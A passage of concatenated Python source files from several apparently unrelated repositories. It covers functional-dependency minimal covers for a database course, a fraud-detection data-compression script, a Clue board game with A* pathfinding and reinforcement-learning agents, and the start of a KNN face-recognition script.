indictor = True
for i in keep_label_set:
label_new = keep_label_set-{i}
S = get_sigma3_case(FD,label_new-{i})
if set(FD[i][1]).issubset(closure(R,S,FD[i][0])):
keep_label_low = remove(R,FD,list(label_new))
#print(keep_label_low)
for j in keep_label_low:
label_all.append(j)
indictor = False
if indictor:
label_all = [keep_label]
#print(label_all)
return label_all
# remove same cases
def remove_same(labels):
label_new = []
for i in labels:
indictor = True
for j in label_new:
if len(set(i)-set(j))==0 and len(set(j)-set(i))==0:
indictor = False
#print(indictor)
if indictor:
label_new.append(i)
#print(label_new)
return label_new
# get sigma3 of different cases for different cases
def get_sigma3(R,sigma_2):
sigma_3 = []
for i in range(0,len(sigma_2)):
labels = remove_same(remove(R,sigma_2[i],range(0,len(sigma_2[i]))))
for j in range(0,len(labels)):
#print(sigma_2[i],labels[j])
A = get_sigma3_case(sigma_2[i],labels[j])
sigma_3.append(A)
return sorted(sigma_3)
# filter the same sigma3
def sigma3_filter(A):
return sigma2_filter(A)
def min_cover(R, FD):
sigma_1 = get_sigma1(R,FD)
sigma_1_filtered = filter_naive(sigma_1)
sigma_2 = get_sigma2(R,sigma_1_filtered,FD)
sigma_2_filtered = sigma2_filter(sigma_2)
sigma_3 = get_sigma3(R,sigma_2_filtered)
sigma_3_filtered = sigma3_filter(sigma_3)
return sigma_3_filtered[0]
## Return all minimal covers reachable from the functional dependencies of a given schema R and functional dependencies F.
## NOTE: This function is not graded for CS4221 students.
def min_covers(R, FD):
sigma_1 = get_sigma1(R,FD)
sigma_1_filtered = filter_naive(sigma_1)
sigma_2 = get_sigma2(R,sigma_1_filtered,FD)
sigma_2_filtered = sigma2_filter(sigma_2)
sigma_3 = get_sigma3(R,sigma_2_filtered)
sigma_3_filtered = sigma3_filter(sigma_3)
return sigma_3_filtered
## Return all minimal covers of a given schema R and functional dependencies F.
## NOTE: This function is not graded for CS4221 students.
def all_min_covers(R, FD):
sigma_plus = all_closures(R, FD)
sigma_1_plus = get_sigma1(R,sigma_plus)
sigma_1_plus_filtered = filter_naive(sigma_1_plus)
sigma_2_plus = get_sigma2(R,sigma_1_plus_filtered,FD)
sigma_2_plus_filtered = sigma2_filter(sigma_2_plus)
sigma_3_plus = get_sigma3(R,sigma_2_plus_filtered)
sigma_3_plus_filtered = sigma3_filter(sigma_3_plus)
return sigma_3_plus_filtered
# ### Test case from the project
# R = ['A', 'B', 'C', 'D']
# FD = [[['A', 'B'], ['C']], [['C'], ['D']]]
# print("Case 1:\nR = ", R,"\nFD = ", FD)
# print("closure of ['A']:")
# print(closure(R, FD, ['A']))
# print("closure of ['A', 'B']:")
# print(closure(R, FD, ['A', 'B']))
# print("all closures of FD:")
# print(all_closures(R, FD))
# #print(candidate_keys(R, FD))
# R = ['A', 'B', 'C', 'D', 'E', 'F']
# FD = [[['A'], ['B', 'C']],[['B'], ['C','D']], [['D'], ['B']],[['A','B','E'], ['F']]]
# print("Case 2:\nR = ", R,"\nFD = ", FD)
# print("a minimal cover of FD:")
# print(min_cover(R, FD))
R = ['A', 'B', 'C']
FD = [[['A'],['B']],[['B'],['C']],[['C'],['A']]]
# print("Case 3:\nR = ", R,"\nFD = ", FD)
# print("all minimal covers reachable for FD:")
# print(min_covers(R, FD))
# print("all minimal covers of FD:")
# print(all_min_covers(R, FD))
# ## Tutorial questions
# R = ['A', 'B', 'C', 'D', 'E']
# FD = [[['A', 'B'],['C']], [['D'],['D', 'B']], [['B'],['E']], [['E'],['D']], [['A', 'B', 'D'],['A', 'B', 'C', 'D']]]
# #print candidate_keys(R, FD)
# print("Case 4:\nR = ", R,"\nFD = ", FD)
# print("a minimal cover of FD:")
# print(min_cover(R, FD))
# print("all minimal covers reachable for FD:")
# print(min_covers(R, FD))
# print("all minimal covers reachable for FD:")
# print(all_min_covers(R, FD))
# R = ['A', 'B', 'C', 'D', 'E','F','G']
# FD = [[['A'],['B']], [['A'],['C']], [['B'],['C']], [['B'],['D']], [['D'],['B']], [['A','B','E'],['F']], [['A','E'],['D']]]
print("Case 4:\nR = ", R,"\nFD = ", FD)
print("closure:")
print(closure(R, FD, ['A']))
print("all closure:")
for i in all_closures(R, FD):
print(i)
print("candidate_keys:")
print(candidate_keys(R, FD))
# print(candidate_keys(R, FD))
print("a minimal cover of FD:")
for i in min_cover(R, FD):
print(i)
# print(min_cover(R, FD))
print("all minimal covers reachable for FD:")
for i in min_covers(R, FD):
print(i)
# print(min_covers(R, FD))
print("all minimal covers reachable for FD:")
# print((all_min_covers(R, FD)))
for i in all_min_covers(R, FD):
print(i)
```
#### File: CS5421-database-tuning/Serial/db_connect.py
```python
from sqlalchemy import create_engine
## Create a connection to the postgres database server.
def get_conn():
server = 'localhost'
dbname = 'cs4221'
username = 'postgres'
password = '<PASSWORD>'#postgres #MODIFIED
    engine = create_engine('postgresql://%s:%s@%s:5432/%s' % (username, password, server, dbname))
return engine
```
|
{
"source": "Jeff010101/IEEE-CIS-Fraud-Detection",
"score": 3
}
|
#### File: Jeff010101/IEEE-CIS-Fraud-Detection/cis-datacompress.py
```python
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
# import os
# for dirname, _, filenames in os.walk('/kaggle/input'):
# for filename in filenames:
# print(os.path.join(dirname, filename))
# Any results you write to the current directory are saved as output.
# library
import os, warnings, random
from sklearn.preprocessing import LabelEncoder
warnings.filterwarnings('ignore')
## Seeder
# :seed to make all processes deterministic # type: int
def seed_everything(seed=0):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
## -------------------
## Memory Reducer
# :df pandas dataframe to reduce size # type: pd.DataFrame()
# :verbose # type: bool
def reduce_mem_usage(df, verbose=True):
numerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']
start_mem = df.memory_usage().sum() / 1024**2
for col in df.columns:
col_type = df[col].dtypes
if col_type in numerics:
c_min = df[col].min()
c_max = df[col].max()
if str(col_type)[:3] == 'int':
if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
else:
if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:
df[col] = df[col].astype(np.float16)
elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:
df[col] = df[col].astype(np.float32)
else:
df[col] = df[col].astype(np.float64)
end_mem = df.memory_usage().sum() / 1024**2
if verbose: print('Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)'.format(end_mem, 100 * (start_mem - end_mem) / start_mem))
return df
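# Illustration (not part of the original script): an int64 column whose values all fit
# in [-128, 127] is downcast to int8, cutting its memory use roughly 8x; float columns
# are downcast to float16/float32 the same way whenever their value range allows it.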
## -------------------
### set up
SEED = 42
seed_everything(SEED)
LOCAL_TEST = False
#################################################################################
print('Load Data')
train_df = pd.read_csv('data/train_transaction.csv')
test_df = pd.read_csv('data/test_transaction.csv')
test_df['isFraud'] = 0
train_identity = pd.read_csv('data/train_identity.csv')
test_identity = pd.read_csv('data/test_identity.csv')
########################### Base check ############################################
if LOCAL_TEST:
for df2 in [train_df, test_df, train_identity, test_identity]:
        df = reduce_mem_usage(df2.copy())  # copy first so the comparison below is against the original values
for col in list(df):
if not df[col].equals(df2[col]):
print('Bad transformation', col)
########################### Base Minification ####################################
train_df = reduce_mem_usage(train_df)
test_df = reduce_mem_usage(test_df)
train_identity = reduce_mem_usage(train_identity)
test_identity = reduce_mem_usage(test_identity)
########################### card4, card6, ProductCD#################################
# Converting Strings to ints(or floats if nan in column) using frequency encoding
# We will be able to use these columns as category or as numerical feature
for col in ['card4', 'card6', 'ProductCD']:
print('Encoding', col)
temp_df = pd.concat([train_df[[col]], test_df[[col]]])
col_encoded = temp_df[col].value_counts().to_dict()
train_df[col] = train_df[col].map(col_encoded)
test_df[col] = test_df[col].map(col_encoded)
print(col_encoded)
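# Illustration (not part of the original script): frequency encoding replaces each
# category with how often it occurs across train and test combined. For a column
# containing ['visa', 'visa', 'mastercard'], value_counts().to_dict() gives
# {'visa': 2, 'mastercard': 1}, so the mapped column becomes [2, 2, 1].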
########################### M columns #########################################
# Converting Strings to ints(or floats if nan in column)
for col in ['M1','M2','M3','M5','M6','M7','M8','M9']:
train_df[col] = train_df[col].map({'T':1, 'F':0})
test_df[col] = test_df[col].map({'T':1, 'F':0})
for col in ['M4']:
print('Encoding', col)
temp_df = pd.concat([train_df[[col]], test_df[[col]]])
col_encoded = temp_df[col].value_counts().to_dict()
train_df[col] = train_df[col].map(col_encoded)
test_df[col] = test_df[col].map(col_encoded)
print(col_encoded)
########################### Identity columns ##################################
def minify_identity_df(df):
df['id_12'] = df['id_12'].map({'Found':1, 'NotFound':0})
df['id_15'] = df['id_15'].map({'New':2, 'Found':1, 'Unknown':0})
df['id_16'] = df['id_16'].map({'Found':1, 'NotFound':0})
df['id_23'] = df['id_23'].map({'TRANSPARENT':4, 'IP_PROXY':3, 'IP_PROXY:ANONYMOUS':2, 'IP_PROXY:HIDDEN':1})
df['id_27'] = df['id_27'].map({'Found':1, 'NotFound':0})
df['id_28'] = df['id_28'].map({'New':2, 'Found':1})
df['id_29'] = df['id_29'].map({'Found':1, 'NotFound':0})
df['id_35'] = df['id_35'].map({'T':1, 'F':0})
df['id_36'] = df['id_36'].map({'T':1, 'F':0})
df['id_37'] = df['id_37'].map({'T':1, 'F':0})
df['id_38'] = df['id_38'].map({'T':1, 'F':0})
df['id_34'] = df['id_34'].fillna(':0')
df['id_34'] = df['id_34'].apply(lambda x: x.split(':')[1]).astype(np.int8)
df['id_34'] = np.where(df['id_34']==0, np.nan, df['id_34'])
df['id_33'] = df['id_33'].fillna('0x0')
df['id_33_0'] = df['id_33'].apply(lambda x: x.split('x')[0]).astype(int)
df['id_33_1'] = df['id_33'].apply(lambda x: x.split('x')[1]).astype(int)
df['id_33'] = np.where(df['id_33']=='0x0', np.nan, df['id_33'])
    df['DeviceType'] = df['DeviceType'].map({'desktop':1, 'mobile':0})
return df
train_identity = minify_identity_df(train_identity)
test_identity = minify_identity_df(test_identity)
for col in ['id_33']:
train_identity[col] = train_identity[col].fillna('unseen_before_label')
test_identity[col] = test_identity[col].fillna('unseen_before_label')
le = LabelEncoder()
le.fit(list(train_identity[col])+list(test_identity[col]))
train_identity[col] = le.transform(train_identity[col])
test_identity[col] = le.transform(test_identity[col])
########################### Final Minification ######################################
train_df = reduce_mem_usage(train_df)
test_df = reduce_mem_usage(test_df)
train_identity = reduce_mem_usage(train_identity)
test_identity = reduce_mem_usage(test_identity)
########################### Export ########################################
train_df.to_pickle('train_transaction.pkl')
test_df.to_pickle('test_transaction.pkl')
train_identity.to_pickle('train_identity.pkl')
test_identity.to_pickle('test_identity.pkl')
```
|
{
"source": "jeff012345/clue-part-duo",
"score": 4
}
|
#### File: jeff012345/clue-part-duo/astar.py
```python
import heapq
from typing import Dict, List, Optional
from definitions import RoomPosition, Position
import random
import sys
class PriorityQueue:
def __init__(self):
        self.elements: List = []
def empty(self) -> bool:
return len(self.elements) == 0
def put(self, item, priority: float):
heapq.heappush(self.elements, (priority, random.randint(1, 9999999999999999), item))
def get(self):
return heapq.heappop(self.elements)[2]
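# Example (not part of the original module): the queue pops the lowest priority value
# first; the random tiebreaker only matters when two entries share the same priority.
#   q = PriorityQueue(); q.put('far', 25); q.put('near', 1)
#   q.get()  # -> 'near'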
def heuristic(a: Position, b: Position) -> float:
if a == b:
return 0
if isinstance(a, RoomPosition):
if isinstance(b, RoomPosition):
raise Exception("Cannot calculate heuristic between two rooms")
return 1 # (1^2 + 0^2)
if isinstance(b, RoomPosition):
return 1 # (1^2 + 0^2)
# both are Space
return (a.col - b.col) ** 2 + (a.row - b.row) ** 2
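# Example (not part of the original module): for two Space nodes the heuristic is the
# squared Euclidean distance, e.g. heuristic(Space(0, 0), Space(3, 4)) == 4**2 + 3**2 == 25;
# any pair involving a RoomPosition counts as a single step.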
def a_star_search(start: Position, goal: Position) -> List[Position]:
if start is None:
raise Exception("Start is None")
if goal is None:
raise Exception("goal is None")
if start == goal:
raise Exception('Start and goal are the same')
frontier = PriorityQueue()
frontier.put(start, 0)
came_from: Dict[Position, Optional[Position]] = {}
cost_so_far: Dict[Position, float] = {}
came_from[start] = None
cost_so_far[start] = 0
while not frontier.empty():
current: Position = frontier.get()
if current == goal:
break
for next in current.connections:
if isinstance(next, RoomPosition) and next != goal:
# once you enter a room, it's a dead end
continue
new_cost = cost_so_far[current] + 1
if next not in cost_so_far or new_cost < cost_so_far[next]:
cost_so_far[next] = new_cost
priority = new_cost + heuristic(goal, next)
frontier.put(next, priority)
came_from[next] = current
if frontier.empty():
print(str(start) + " to " + str(goal))
raise Exception('no path found')
shortest_path = []
prev = goal
while prev is not None:
shortest_path.append(prev)
prev = came_from[prev]
shortest_path.reverse()
return shortest_path
```
#### File: jeff012345/clue-part-duo/definitions.py
```python
from __future__ import annotations
from enum import Enum
from typing import List, Tuple
import random
def roll_dice() -> int:
return random.randint(1, 6)
def pretty_print_enum(enum: Enum):
return " ".join(list(map(lambda s: s.lower().capitalize(), enum.name.split("_"))))
class Room(Enum):
STUDY = 1
LIBRARY = 2
CONSERVATORY = 3
HALL = 4
KITCHEN = 5
BALLROOM = 6
DINING_ROOM = 7
LOUNGE = 8
BILLARD_ROOM = 9
def pretty(self):
return pretty_print_enum(self)
class Character(Enum):
MRS_WHITE = 1
MRS_PEACOCK = 2
MISS_SCARLET = 3
COLONEL_MUSTARD = 4
MR_GREEN = 5
PROFESSOR_PLUM = 6
def pretty(self):
return pretty_print_enum(self)
class Weapon(Enum):
CANDLESTICK = 1
REVOLVER = 2
ROPE = 3
WRENCH = 4
LEAD_PIPE = 5
KNIFE = 6
def pretty(self):
return pretty_print_enum(self)
class CardType(Enum):
ROOM = 1
CHARACTER = 2
WEAPON = 3
def pretty(self):
return pretty_print_enum(self)
class Position:
connections: List[Position]
    def __init__(self, connections=None):
        # use None as the default to avoid sharing one mutable list across instances
        self.connections = connections if connections is not None else []
class RoomPosition(Position):
room: Room
def __init__(self, room: Room, connections: List[Position]):
super().__init__(connections)
self.room = room
def __repr__(self):
return str(self.room) ## + "; " + str(self.connections)
def __eq__(self, other):
if isinstance(other, RoomPosition):
return self.room == other.room
return False
def __ne__(self, other):
"""Overrides the default implementation (unnecessary in Python 3)"""
x = self.__eq__(other)
if x is not NotImplemented:
return not x
return NotImplemented
def __hash__(self):
return super().__hash__()
class Space(Position):
row: int
col: int
    def __init__(self, row, col, connections=None):
super().__init__(connections)
self.row = row
self.col = col
def __repr__(self):
return self.pos_str()
def pos_str(self):
return "(" + str(self.row + 1) + "," + str(self.col + 1) + ")"
def __eq__(self, other):
if isinstance(other, Space):
return self.row == other.row and self.col == other.col
return False
def __ne__(self, other):
"""Overrides the default implementation (unnecessary in Python 3)"""
x = self.__eq__(other)
if x is not NotImplemented:
return not x
return NotImplemented
def __hash__(self):
return super().__hash__()
class Card:
value: Enum
type: CardType
def __init__(self, value: Enum, type: CardType):
self.value = value
self.type = type
def __str__(self):
return self.value.pretty()
def __repr__(self):
return self.value.name
def __eq__(self, other):
"""Overrides the default implementation"""
if isinstance(other, Card):
return self.type == other.type and self.value == other.value
return False
def __ne__(self, other):
"""Overrides the default implementation (unnecessary in Python 3)"""
x = self.__eq__(other)
if x is not NotImplemented:
return not x
return NotImplemented
def __hash__(self):
"""Overrides the default implementation"""
return hash(tuple(sorted(self.__dict__.items())))
class Solution:
weapon: Card
character: Card
room: Card
def __init__(self, weapon: Card, character: Card, room: Card):
self.weapon = weapon
self.character = character
self.room = room
def is_complete(self):
return self.weapon is not None and self.room is not None and self.character is not None
def is_empty(self):
return self.weapon is None and self.room is None and self.character is None
def __repr__(self):
c = 'None' if self.character is None else self.character.value.pretty()
r = 'None' if self.room is None else self.room.value.pretty()
w = 'None' if self.weapon is None else self.weapon.value.pretty()
return c + " in the " + r + " with the " + w
def is_match(self, other: Solution):
return self.weapon == other.weapon and self.room == other.room and self.character == other.character
class Deck:
def make_deck() -> List[Card]:
return [
Card(Room.STUDY, CardType.ROOM),
Card(Room.LIBRARY, CardType.ROOM),
Card(Room.CONSERVATORY, CardType.ROOM),
Card(Room.HALL, CardType.ROOM),
Card(Room.KITCHEN, CardType.ROOM),
Card(Room.BALLROOM, CardType.ROOM),
Card(Room.DINING_ROOM, CardType.ROOM),
Card(Room.LOUNGE, CardType.ROOM),
Card(Room.BILLARD_ROOM, CardType.ROOM),
Card(Character.MRS_WHITE, CardType.CHARACTER),
Card(Character.MRS_PEACOCK, CardType.CHARACTER),
Card(Character.MISS_SCARLET, CardType.CHARACTER),
Card(Character.COLONEL_MUSTARD, CardType.CHARACTER),
Card(Character.MR_GREEN, CardType.CHARACTER),
Card(Character.PROFESSOR_PLUM, CardType.CHARACTER),
Card(Weapon.CANDLESTICK, CardType.WEAPON),
Card(Weapon.REVOLVER, CardType.WEAPON),
Card(Weapon.ROPE, CardType.WEAPON),
Card(Weapon.WRENCH, CardType.WEAPON),
Card(Weapon.LEAD_PIPE, CardType.WEAPON),
Card(Weapon.KNIFE, CardType.WEAPON)
]
static_deck = make_deck()
```
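A small sketch (not from the original repository) showing how the deck and `Solution` types above compose; the random draw is only for illustration and assumes the module is importable as `definitions`.
```python
import random

from definitions import Deck, Solution, CardType

rooms = [c for c in Deck.static_deck if c.type == CardType.ROOM]
characters = [c for c in Deck.static_deck if c.type == CardType.CHARACTER]
weapons = [c for c in Deck.static_deck if c.type == CardType.WEAPON]

# Pick one card of each type as a hidden solution, then print it.
secret = Solution(random.choice(weapons), random.choice(characters), random.choice(rooms))
print(secret)  # e.g. "Mrs White in the Kitchen with the Rope"
```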
#### File: jeff012345/clue-part-duo/log_book_ui.py
```python
from typing import List, Set, Dict, Tuple, Optional
import pygame
from pygame_gui import UIManager
from pygame_gui.elements import UIPanel, UILabel, UITextBox, UIButton, UIImage
from definitions import *
class LogBookPanel:
CHECKED_IMG = pygame.image.load('assets/checked.png')
UNCHECKED_IMG = pygame.image.load('assets/unchecked.png')
PANEL_WIDTH = 200
panel: UIPanel
_checkboxes: Dict[UIImage, bool]
def __init__(self, manager: UIManager):
self.manager = manager
self._checkboxes = dict()
panel_rect = pygame.Rect((0,0), (LogBookPanel.PANEL_WIDTH, 1000))
self.panel = UIPanel(panel_rect, 0, manager, element_id='log_book_panel')
UILabel(pygame.Rect((0,0), (LogBookPanel.PANEL_WIDTH, 20)),
"Player Logbook",
manager,
container=self.panel,
object_id="categoryLabel")
height = self._create_section("Chacater", Character, 20)
height = self._create_section("Room", Room, height)
self._create_section("Weapon", Weapon, height)
self.panel.hide()
def show(self):
self.panel.show()
def process_events(self, event):
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
# check if click is inside panel first?
for cb in self._checkboxes.keys():
if cb.get_abs_rect().collidepoint(pos):
self._toggle_img(cb)
break
def _create_section(self, title: str, items: Enum, y_offset) -> int:
item_height = 35
label_rect = pygame.Rect((0, y_offset), (LogBookPanel.PANEL_WIDTH, item_height))
label_text = "<strong>" + title + "</strong>"
title_label = UITextBox(label_text, label_rect, self.manager, container=self.panel)
y_offset += item_height
item_label_width = LogBookPanel.PANEL_WIDTH - 30
for item in items:
img_rect = pygame.Rect((5, y_offset + 6), (24, 24))
checkbox_img = UIImage(img_rect, LogBookPanel.UNCHECKED_IMG, self.manager, container=self.panel)
label_rect = pygame.Rect((30, y_offset), (item_label_width, item_height))
item_button = UITextBox(item.pretty(), label_rect, self.manager, container=self.panel)
self._checkboxes[checkbox_img] = False
y_offset += item_height
return y_offset
def _toggle_img(self, checkbox: UIImage):
if self._checkboxes.get(checkbox):
checkbox.set_image(LogBookPanel.UNCHECKED_IMG)
self._checkboxes[checkbox] = False
else:
checkbox.set_image(LogBookPanel.CHECKED_IMG)
self._checkboxes[checkbox] = True
```
#### File: jeff012345/clue-part-duo/main.py
```python
import threading
import sys
import os
import traceback
import game_board
from Clue import Director
from player import NaiveComputerPlayer, HumanPlayer
from ai_players import RLPlayer, DuelAiPlayer
from paths import Board
## Model Config
room_policy_dir = os.path.join("best_policies", "room")
guess_policy_dir = os.path.join("best_policies", "character_weapon")
## setup
new_game_barrier = threading.Barrier(3)
set_guess_barrier = threading.Barrier(3)
next_turn_barrier = threading.Barrier(3)
end_game_lock = threading.Lock()
run_game_lock = threading.Lock()
run_game_lock.acquire()
interaction_lock = threading.Lock()
human_player = HumanPlayer(interaction_lock)
ai_player = DuelAiPlayer(set_guess_barrier, next_turn_barrier)
players = [
NaiveComputerPlayer(),
NaiveComputerPlayer(),
NaiveComputerPlayer(),
NaiveComputerPlayer(),
human_player,
ai_player
]
director = Director(end_game_lock, players, interaction_lock)
def load_room_env():
import tensorflow as tf
from tf_agents.environments import tf_py_environment
from tf_agents.policies import policy_saver
from clue_room_tf_env import ClueGameRoomEnvImplementation
tf.compat.v1.enable_v2_behavior()
eval_py_env = ClueGameRoomEnvImplementation(director, set_guess_barrier, next_turn_barrier)
eval_tf_env = tf_py_environment.TFPyEnvironment(eval_py_env)
saved_policy = tf.compat.v2.saved_model.load(room_policy_dir)
return (eval_tf_env, saved_policy)
def load_guess_env():
import tensorflow as tf
from tf_agents.environments import tf_py_environment
from tf_agents.policies import policy_saver
from clue_tf_env import ClueGameEnvImplementation
tf.compat.v1.enable_v2_behavior()
eval_py_env = ClueGameEnvImplementation(director, set_guess_barrier, next_turn_barrier)
eval_tf_env = tf_py_environment.TFPyEnvironment(eval_py_env)
saved_policy = tf.compat.v2.saved_model.load(guess_policy_dir)
return (eval_tf_env, saved_policy)
# THREAD: runs the UI game board
def run_board():
try:
game_board.run(director, run_game_lock, end_game_lock, human_player, interaction_lock)
except Exception as err:
end_game_lock.acquire()
traceback.print_tb(err.__traceback__)
raise err
# THREAD: runs the game director
def run_game():
try:
Board.calculate_room_distances()
# wait for player to start the game
run_game_lock.acquire()
if end_game_lock.locked():
# player quit game before start
new_game_barrier.abort()
return
director.new_game()
# signal this thread is ready to start
new_game_barrier.wait()
director.play_auto_game_with_lock(end_game_lock)
#game is done
if not end_game_lock.locked():
end_game_lock.acquire()
# signal env threads to quit
next_turn_barrier.abort()
except Exception as err:
if not end_game_lock.locked():
end_game_lock.acquire()
new_game_barrier.abort()
set_guess_barrier.abort()
next_turn_barrier.abort()
traceback.print_tb(err.__traceback__)
raise err
# THREAD: runs the weapon and character guess TF environment
def run_guess_ai():
try:
(guess_env, guess_policy) = load_guess_env()
# signal this thread is ready to start
new_game_barrier.wait()
# wait for first turn
next_turn_barrier.wait()
guess_time_step = guess_env.reset()
while not end_game_lock.locked():
# set the guess and wait for next turn
guess_action_step = guess_policy.action(guess_time_step)
guess_time_step = guess_env.step(guess_action_step.action)
except threading.BrokenBarrierError as err:
print("barrier was aborted. Quiting...")
except Exception as err:
if not end_game_lock.locked():
end_game_lock.acquire()
new_game_barrier.abort()
next_turn_barrier.abort()
set_guess_barrier.abort()
traceback.print_tb(err.__traceback__)
raise err
# THREAD: runs the room guess TF environment
def run_room_ai():
try:
(room_env, room_policy) = load_room_env()
# signal this thread is ready to start
new_game_barrier.wait()
# wait for first turn
next_turn_barrier.wait()
room_time_step = room_env.reset()
while not end_game_lock.locked():
# set the guess and wait for next turn
room_action_step = room_policy.action(room_time_step)
room_time_step = room_env.step(room_action_step.action)
except threading.BrokenBarrierError as err:
print("barrier was aborted. Quiting...")
except Exception as err:
if not end_game_lock.locked():
end_game_lock.acquire()
new_game_barrier.abort()
next_turn_barrier.abort()
set_guess_barrier.abort()
traceback.print_tb(err.__traceback__)
raise err
if __name__ == "__main__":
thread1 = threading.Thread(target=run_board)
thread2 = threading.Thread(target=run_game)
thread3 = threading.Thread(target=run_room_ai)
thread4 = threading.Thread(target=run_guess_ai)
# Will execute all four threads in parallel
thread1.start()
thread2.start()
thread3.start()
thread4.start()
# Joins threads back to the parent process, which is this program
thread1.join()
thread2.join()
thread3.join()
thread4.join()
```
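The four threads above rendezvous on `threading.Barrier` objects and abort them whenever a thread fails, so no other thread is left blocked forever. A minimal stand-alone sketch of that wait/abort pattern (plain stdlib, not part of the repository):
```python
import threading

start_barrier = threading.Barrier(2)  # two parties must arrive before work begins

def worker(name, fail=False):
    try:
        if fail:
            start_barrier.abort()  # simulate a setup error: release anyone waiting
            return
        start_barrier.wait()       # rendezvous with the other thread
        print(name, "started")
    except threading.BrokenBarrierError:
        print(name, "barrier was aborted, quitting")

threads = [threading.Thread(target=worker, args=("worker-1",)),
           threading.Thread(target=worker, args=("worker-2", True))]
for t in threads: t.start()
for t in threads: t.join()
```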
#### File: jeff012345/clue-part-duo/player_roll.py
```python
from __future__ import annotations
from typing import Callable, List, Set, Dict, Tuple, Optional
import pygame
import pygame_gui
from player import HumanPlayer
from paths import Board, board_spaces, doors
from game_board_util import scale_position
from definitions import roll_dice
from log_book_ui import LogBookPanel
from definitions import RoomPosition
class PlayerRoll:
### Static
SPACE_COLOR = (0, 0, 0)
def _is_adjacent(p1, p2):
return (abs(p1[0] - p2[0]) == 1 and p1[1] == p2[1]) \
or (abs(p1[1] - p2[1]) == 1 and p1[0] == p2[0])
def _valid_position(pos):
return pos[0] >= 0 and pos[0] < 25 and pos[1] >= 0 and pos[1] < 24 \
and board_spaces[pos[0]][pos[1]] != 0
player: HumanPlayer
surface: pygame.Surface
on_end_turn: Callable
_rolling: bool
_distance: int
_positions: List[Position]
_rect_to_position: Dict[Tuple, Position]
_rects: List[pygame.Rect]
_drawn_rects: List[pygame.Rect]
def __init__(self, surface: pygame.Surface, player: HumanPlayer, on_end_turn: Callable):
self.surface = surface
self._rolling = False
self.player = player
self.on_end_turn = on_end_turn
def roll(self):
self._rolling = True
self._distance = roll_dice()
print("rolled a " + str(self._distance))
self._calculate_positions()
def _calculate_positions(self):
edge = set(self.player.board_position.connections)
self._positions = list(self._find_all_positions_search(self._distance, edge, set()))
self._rects = []
self._rect_to_position = dict()
for p in self._positions:
coords = list(map(scale_position, Board.coords_from_position(p)))
new_rects = list(map(lambda p: pygame.Rect((p[0] - 5, p[1] - 5), (11, 11)), coords))
self._rects.extend(new_rects)
for r in new_rects:
self._rect_to_position[(r.x, r.y)] = p
def _find_all_positions_search(self, distance: int, edge: Set[Position],
all_positions: Set[Position]) -> Set[Position]:
if distance == 1:
return all_positions.union(edge)
new_edge: Set[Position] = set()
for p in edge:
all_positions.add(p)
if isinstance(p, RoomPosition):
# the path stops at the door
continue
for conn in p.connections:
if conn not in all_positions and conn not in edge \
and conn != self.player.board_position:
# haven't seen this node before
new_edge.add(conn)
return self._find_all_positions_search(distance - 1, new_edge, all_positions)
def draw(self):
if not self._rolling:
return
self._drawn_rects = list(map(lambda rect: pygame.draw.rect(self.surface, PlayerRoll.SPACE_COLOR, rect), self._rects))
def process_events(self, event):
if not self._rolling:
return
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
i = 0
for rect in self._drawn_rects:
rect = rect.move(LogBookPanel.PANEL_WIDTH, 0)
if rect.collidepoint(pos):
org_rect = self._rects[i]
self._click_move(self._rect_to_position[(org_rect.x, org_rect.y)])
break
i += 1
def _click_move(self, pos: Position):
self.player.move(pos)
self._rolling = False
self.on_end_turn()
```
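`PlayerRoll._find_all_positions_search` expands a frontier of board positions one step per die pip, which is breadth-first reachability with a depth limit. A self-contained sketch of the same idea over a hypothetical adjacency dict (not the actual Clue board graph, and it omits the rule that a room stops the path):
```python
def reachable_within(graph, start, distance):
    """Every node reachable from `start` in 1..distance steps."""
    frontier = set(graph[start])              # one step away
    seen = set()
    for _ in range(distance - 1):
        seen |= frontier
        frontier = {n for node in frontier for n in graph[node]
                    if n not in seen and n != start}
    return seen | frontier

# toy graph: a short corridor with a branch at "c"
corridor = {"a": ["b"], "b": ["a", "c"], "c": ["b", "d", "e"],
            "d": ["c"], "e": ["c"]}
print(reachable_within(corridor, "a", 3))     # {'b', 'c', 'd', 'e'}
```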
|
{
"source": "Jeff0407/Python_MachineLearning",
"score": 4
}
|
#### File: Computer_Vision/Real_Time_Face _Recognition/face_recognition.py
```python
import numpy as np
import cv2
import os
# -----------------------------KNN CODE -------------------------------------
def distance(v1, v2):
# Euclidean distance
return np.sqrt(((v1 - v2) ** 2).sum())
def knn(train, test, k=5):
dist = []
for i in range(train.shape[0]):
# Get vector and label
ix = train[i, :-1] # features: every column of row i except the last
iy = train[i, -1] # label: the last column of row i
# Compute the distance from test point
d = distance(test, ix)
dist.append([d, iy])
# Sort based on distance and get top k
dk = sorted(dist, key=lambda x: x[0])[:k]
# Retrieve only the labels
labels = np.array(dk)[:, -1]
# Get frequencies of each label
output = np.unique(labels, return_counts=True)
# Find max frequency and corresponding label
index = np.argmax(output[1])
return output[0][index]
# -------------------------------------------------------------------------
cap = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
dataset_path = './face_dataset/'
face_data = [] # store each face data
labels = []
class_id = 0 # Labels for every given file
names = {} # mapping between id and name
# Dataset preparation: go through every file in face_dataset and load
# all the data previously collected with face_data.py
for fx in os.listdir(dataset_path):
if fx.endswith('.npy'):
names[class_id] = fx[:-4]
data_item = np.load(dataset_path + fx)
face_data.append(data_item)
target = class_id * np.ones((data_item.shape[0],))
class_id += 1
labels.append(target)
face_dataset = np.concatenate(face_data, axis=0)
